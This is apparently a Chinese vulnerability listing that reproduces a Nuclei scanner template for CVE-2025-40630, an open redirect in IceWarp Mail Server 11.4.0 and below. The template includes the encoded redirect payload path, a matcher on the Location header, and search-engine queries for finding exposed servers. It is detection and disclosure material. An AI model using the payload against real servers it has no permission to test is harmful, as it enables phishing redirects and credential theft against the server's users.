漏洞描述
IceWarp Mail Server version 11.4.0 and below contains an open redirect vulnerability that allows attackers to redirect users to arbitrary external domains through malicious URLs.
CVE-2025-40630: IceWarp Mail Server ≤11.4.0 - Open Redirect
PoC代码[已公开]
id: CVE-2025-40630
info:
name: IceWarp Mail Server ≤11.4.0 - Open Redirect
author: DhiyaneshDK
severity: medium
description: |
IceWarp Mail Server version 11.4.0 and below contains an open redirect vulnerability that allows attackers to redirect users to arbitrary external domains through malicious URLs.
impact: |
An attacker can craft malicious URLs to redirect users to external malicious websites, potentially leading to phishing attacks or credential theft.
remediation: |
Update IceWarp Mail Server to a version newer than 11.4.0. Implement proper URL validation and restrict redirects to trusted domains only.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-40630
- https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-icewarp-mail-server
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2025-40630
cwe-id: CWE-601
epss-score: 0.00275
epss-percentile: 0.50703
cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: icewarp
product: mail_server
shodan-query: 'http.title:"IceWarp"'
fofa-query: 'title="IceWarp"'
google-query: intitle:"icewarp"
tags: cve,cve2025,icewarp,redirect,open-redirect
http:
- method: GET
path:
- "{{BaseURL}}/%2f%5c%2foast.pro%2f.."
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$'
- type: status
status:
- 302
# digest: 4a0a004730450221008a0306ca1feb4159d34ea21ab1cb2d88ff9c66069d6cad7f44361fa97d45664b0220273ca74ab115ac7371381bb3f978a68067d801954fa860d334ccb7ae4cafedc5:922c64590222798bb761d5b6d8e72950